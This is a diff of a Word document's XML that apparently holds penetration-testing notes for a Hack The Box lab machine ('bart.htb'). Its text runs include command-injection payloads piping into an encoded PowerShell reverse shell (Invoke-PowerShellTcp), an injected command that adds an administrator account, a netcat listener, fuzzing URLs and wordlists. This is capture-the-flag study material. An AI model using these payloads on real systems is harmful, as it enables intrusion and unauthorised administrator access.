@@ -7831,15 +8280,12 @@
           <w:u w:val="none"/>
           <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
         </w:rPr>
-        <w:t>5- On parameter :</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
+        <w:t xml:space="preserve">4-Choose Demo notification ps1 </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
         <w:rPr>
           <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
           <w:color w:val="000000"/>
@@ -7849,13 +8295,6 @@
           <w:u w:val="none"/>
           <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
         </w:rPr>
-        <w:t xml:space="preserve">5a- You should prepare the encoded code for powershell like </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr/>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -7864,36 +8303,24 @@
           <w:kern w:val="2"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
-          <w:highlight w:val="yellow"/>
           <w:u w:val="none"/>
           <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
         </w:rPr>
-        <w:t>cat Invoke-PowerShellTcp.ps1 | iconv --to-code UTF-16LE |   base64 -w 0</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
+        <w:t>5- On parameter :</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
         <w:rPr>
           <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
           <w:color w:val="000000"/>
           <w:kern w:val="2"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
-          <w:highlight w:val="yellow"/>
           <w:u w:val="none"/>
           <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
         </w:rPr>
-        <w:t>cat Invoke-PowerShellTcp.ps1 | iconv --to-code UTF-16LE |   base64 -w 0 | xclip  -selection clipboard</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr/>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -7905,15 +8332,12 @@
           <w:u w:val="none"/>
           <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
         </w:rPr>
-        <w:t xml:space="preserve">5b-type </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
+        <w:t xml:space="preserve">5a- You should prepare the encoded code for powershell like </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
         <w:rPr>
           <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
           <w:color w:val="000000"/>
@@ -7924,13 +8348,6 @@
           <w:u w:val="none"/>
           <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
         </w:rPr>
-        <w:t>test |  powershell -EncodedCommand ZgB1AG4AY…</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr/>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -7939,16 +8356,133 @@
           <w:kern w:val="2"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
+          <w:highlight w:val="yellow"/>
           <w:u w:val="none"/>
           <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
         </w:rPr>
+        <w:t>cat Invoke-PowerShellTcp.ps1 | iconv --to-code UTF-16LE |   base64 -w 0</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:highlight w:val="yellow"/>
+          <w:u w:val="none"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:highlight w:val="yellow"/>
+          <w:u w:val="none"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:t>cat Invoke-PowerShellTcp.ps1 | iconv --to-code UTF-16LE |   base64 -w 0 | xclip  -selection clipboard</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:u w:val="none"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:u w:val="none"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:t xml:space="preserve">5b-type </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:highlight w:val="yellow"/>
+          <w:u w:val="none"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:highlight w:val="yellow"/>
+          <w:u w:val="none"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:t>test |  powershell -EncodedCommand ZgB1AG4AY…</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:u w:val="none"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:u w:val="none"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
         <w:t>5c-Set your listener and save the notification</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:u w:val="none"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -8034,9 +8568,6 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
         <w:rPr>
           <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
           <w:color w:val="000000"/>
@@ -8046,12 +8577,8 @@
           <w:u w:val="none"/>
           <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
         </w:rPr>
-        <w:t xml:space="preserve">5e- Done </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
+      </w:pPr>
+      <w:r>
         <w:rPr>
           <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
           <w:color w:val="000000"/>
@@ -8061,8 +8588,12 @@
           <w:u w:val="none"/>
           <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
         </w:rPr>
-      </w:pPr>
-      <w:r>
+        <w:t xml:space="preserve">5e- Done </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
         <w:rPr>
           <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
           <w:color w:val="000000"/>
@@ -8072,12 +8603,6 @@
           <w:u w:val="none"/>
           <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
         </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr/>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -8089,31 +8614,22 @@
           <w:u w:val="none"/>
           <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
         </w:rPr>
-        <w:t xml:space="preserve">Alternate way </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
         <w:rPr>
           <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
           <w:color w:val="000000"/>
           <w:kern w:val="2"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
-          <w:highlight w:val="yellow"/>
           <w:u w:val="none"/>
           <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
         </w:rPr>
-        <w:t>abc.txt | net user pentestuser abc123! /add ; net localgroup administrators pentestuser /add</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
+      </w:pPr>
+      <w:r>
         <w:rPr>
           <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
           <w:color w:val="000000"/>
@@ -8123,23 +8639,75 @@
           <w:u w:val="none"/>
           <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
         </w:rPr>
-      </w:pPr>
-      <w:r>
+        <w:t xml:space="preserve">Alternate way </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
         <w:rPr>
           <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
           <w:color w:val="000000"/>
           <w:kern w:val="2"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
+          <w:highlight w:val="yellow"/>
           <w:u w:val="none"/>
           <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
         </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:highlight w:val="yellow"/>
+          <w:u w:val="none"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:t>abc.txt | net user pentestuser abc123! /add ; net localgroup administrators pentestuser /add</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:u w:val="none"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:u w:val="none"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:highlight w:val="yellow"/>
+          <w:u w:val="none"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -8244,13 +8812,12 @@
       <w:pPr>
         <w:pStyle w:val="Normal"/>
         <w:jc w:val="left"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
         <w:rPr>
           <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
           <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
           <w:i w:val="false"/>
           <w:iCs w:val="false"/>
           <w:color w:val="000000"/>
@@ -8260,14 +8827,6 @@
           <w:u w:val="none"/>
           <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
         </w:rPr>
-        <w:t xml:space="preserve">-To have up down key after a shell with nc </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="left"/>
-        <w:rPr/>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -8280,10 +8839,48 @@
           <w:kern w:val="2"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
-          <w:highlight w:val="yellow"/>
           <w:u w:val="none"/>
           <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
         </w:rPr>
+        <w:t xml:space="preserve">-To have up down key after a shell with nc </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:highlight w:val="yellow"/>
+          <w:u w:val="none"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:highlight w:val="yellow"/>
+          <w:u w:val="none"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
         <w:t>rlwrap nc -nlvp 9001</w:t>
       </w:r>
     </w:p>
@@ -8381,7 +8978,9 @@
       <w:pPr>
         <w:pStyle w:val="Normal"/>
         <w:jc w:val="left"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -8464,7 +9063,9 @@
       <w:pPr>
         <w:pStyle w:val="Normal"/>
         <w:jc w:val="left"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -8477,7 +9078,9 @@
       <w:pPr>
         <w:pStyle w:val="Normal"/>
         <w:jc w:val="left"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -8877,13 +9480,12 @@
       <w:pPr>
         <w:pStyle w:val="Normal"/>
         <w:jc w:val="left"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
         <w:rPr>
           <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
           <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
           <w:i w:val="false"/>
           <w:iCs w:val="false"/>
           <w:color w:val="000000"/>
@@ -8893,6 +9495,21 @@
           <w:u w:val="none"/>
           <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
         </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:u w:val="none"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
         <w:t>-Extract email from a text</w:t>
       </w:r>
     </w:p>
@@ -8900,7 +9517,9 @@
       <w:pPr>
         <w:pStyle w:val="Normal"/>
         <w:jc w:val="left"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -8967,7 +9586,9 @@
       <w:hyperlink r:id="rId21">
         <w:r>
           <w:rPr>
-            <w:rStyle w:val="InternetLink"/>
+            <w:rStyle w:val="ListLabel4"/>
+            <w:color w:val="000080"/>
+            <w:u w:val="single"/>
           </w:rPr>
           <w:t>http://forum.bart.htb/</w:t>
         </w:r>
@@ -9326,7 +9947,8 @@
       <w:hyperlink r:id="rId23">
         <w:r>
           <w:rPr>
-            <w:rStyle w:val="SourceText"/>
+            <w:rStyle w:val="ListLabel6"/>
+            <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono" w:eastAsia="Liberation Mono" w:cs="Liberation Mono"/>
             <w:highlight w:val="yellow"/>
           </w:rPr>
           <w:t>http://bart.htb/FUZZ/</w:t>
@@ -9366,7 +9988,8 @@
       <w:hyperlink r:id="rId24">
         <w:r>
           <w:rPr>
-            <w:rStyle w:val="SourceText"/>
+            <w:rStyle w:val="ListLabel6"/>
+            <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono" w:eastAsia="Liberation Mono" w:cs="Liberation Mono"/>
             <w:highlight w:val="yellow"/>
           </w:rPr>
           <w:t>http://bart.htb/FUZZ</w:t>
@@ -9681,7 +10304,9 @@
       <w:pPr>
         <w:pStyle w:val="Normal"/>
         <w:jc w:val="left"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -10110,12 +10735,14 @@
       <w:pPr>
         <w:pStyle w:val="Normal"/>
         <w:jc w:val="left"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New;Courier;monospace" w:hAnsi="Courier New;Courier;monospace"/>
         </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New;Courier;monospace" w:hAnsi="Courier New;Courier;monospace"/>
+        </w:rPr>
         <w:t>host.local is the DNS name of the host, be carefull to it since dns can referred to many website for a same ip address</w:t>
       </w:r>
     </w:p>
@@ -10194,12 +10821,14 @@
       <w:pPr>
         <w:pStyle w:val="Normal"/>
         <w:jc w:val="left"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New;Courier;monospace" w:hAnsi="Courier New;Courier;monospace"/>
         </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New;Courier;monospace" w:hAnsi="Courier New;Courier;monospace"/>
+        </w:rPr>
         <w:t>Dictionary to try</w:t>
       </w:r>
     </w:p>
@@ -10207,12 +10836,14 @@
       <w:pPr>
         <w:pStyle w:val="Normal"/>
         <w:jc w:val="left"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New;Courier;monospace" w:hAnsi="Courier New;Courier;monospace"/>
         </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New;Courier;monospace" w:hAnsi="Courier New;Courier;monospace"/>
+        </w:rPr>
         <w:t>- metasploit/common</w:t>
       </w:r>
     </w:p>
@@ -10220,12 +10851,14 @@
       <w:pPr>
         <w:pStyle w:val="Normal"/>
         <w:jc w:val="left"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New;Courier;monospace" w:hAnsi="Courier New;Courier;monospace"/>
         </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New;Courier;monospace" w:hAnsi="Courier New;Courier;monospace"/>
+        </w:rPr>
         <w:t>- metasploit/default_http_pass</w:t>
       </w:r>
     </w:p>
@@ -10233,12 +10866,14 @@
       <w:pPr>
         <w:pStyle w:val="Normal"/>
         <w:jc w:val="left"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New;Courier;monospace" w:hAnsi="Courier New;Courier;monospace"/>
         </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New;Courier;monospace" w:hAnsi="Courier New;Courier;monospace"/>
+        </w:rPr>
         <w:t>- metasploit/unix_pass</w:t>
       </w:r>
     </w:p>
@@ -10246,12 +10881,14 @@
       <w:pPr>
         <w:pStyle w:val="Normal"/>
         <w:jc w:val="left"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New;Courier;monospace" w:hAnsi="Courier New;Courier;monospace"/>
         </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New;Courier;monospace" w:hAnsi="Courier New;Courier;monospace"/>
+        </w:rPr>
         <w:t>- rockyou</w:t>
       </w:r>
     </w:p>
@@ -10273,7 +10910,9 @@
       <w:pPr>
         <w:pStyle w:val="Normal"/>
         <w:jc w:val="left"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New;Courier;monospace" w:hAnsi="Courier New;Courier;monospace"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -10311,8 +10950,10 @@
       <w:hyperlink r:id="rId26">
         <w:r>
           <w:rPr>
-            <w:rStyle w:val="InternetLink"/>
+            <w:rStyle w:val="ListLabel7"/>
             <w:rFonts w:ascii="Courier New;Courier;monospace" w:hAnsi="Courier New;Courier;monospace"/>
+            <w:color w:val="000080"/>
+            <w:u w:val="single"/>
           </w:rPr>
           <w:t>http://internal-01.bart.htb/</w:t>
         </w:r>
@@ -10320,9 +10961,11 @@
       <w:hyperlink r:id="rId27">
         <w:r>
           <w:rPr>
-            <w:rStyle w:val="InternetLink"/>
+            <w:rStyle w:val="ListLabel8"/>
             <w:rFonts w:ascii="Courier New;Courier;monospace" w:hAnsi="Courier New;Courier;monospace"/>
+            <w:color w:val="000080"/>
             <w:highlight w:val="yellow"/>
+            <w:u w:val="single"/>
           </w:rPr>
           <w:t>simple_chat</w:t>
         </w:r>
@@ -10330,8 +10973,10 @@
       <w:hyperlink r:id="rId28">
         <w:r>
           <w:rPr>
-            <w:rStyle w:val="InternetLink"/>
+            <w:rStyle w:val="ListLabel7"/>
             <w:rFonts w:ascii="Courier New;Courier;monospace" w:hAnsi="Courier New;Courier;monospace"/>
+            <w:color w:val="000080"/>
+            <w:u w:val="single"/>
           </w:rPr>
           <w:t>/login_form.php</w:t>
         </w:r>
@@ -10391,7 +11036,9 @@
       <w:pPr>
         <w:pStyle w:val="Normal"/>
         <w:jc w:val="left"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -10480,7 +11127,9 @@
       <w:pPr>
         <w:pStyle w:val="Normal"/>
         <w:jc w:val="left"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -10493,7 +11142,9 @@
       <w:pPr>
         <w:pStyle w:val="Normal"/>
         <w:jc w:val="left"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -10619,285 +11270,8 @@
       <w:pPr>
         <w:pStyle w:val="Normal"/>
         <w:jc w:val="left"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
         <w:rPr>
           <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-          <w:i w:val="false"/>
-          <w:iCs w:val="false"/>
-          <w:color w:val="auto"/>
-          <w:kern w:val="2"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
-        </w:rPr>
-        <w:t xml:space="preserve">*First on kali </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="left"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-          <w:i w:val="false"/>
-          <w:iCs w:val="false"/>
-          <w:color w:val="auto"/>
-          <w:kern w:val="2"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
-        </w:rPr>
-        <w:t>python /opt/impacket/examples/smbserver.py test .</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="left"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-          <w:i w:val="false"/>
-          <w:iCs w:val="false"/>
-          <w:color w:val="auto"/>
-          <w:kern w:val="2"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
-        </w:rPr>
-        <w:t xml:space="preserve">*Second on vulnerable host </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="left"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-          <w:i w:val="false"/>
-          <w:iCs w:val="false"/>
-          <w:color w:val="auto"/>
-          <w:kern w:val="2"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
-        </w:rPr>
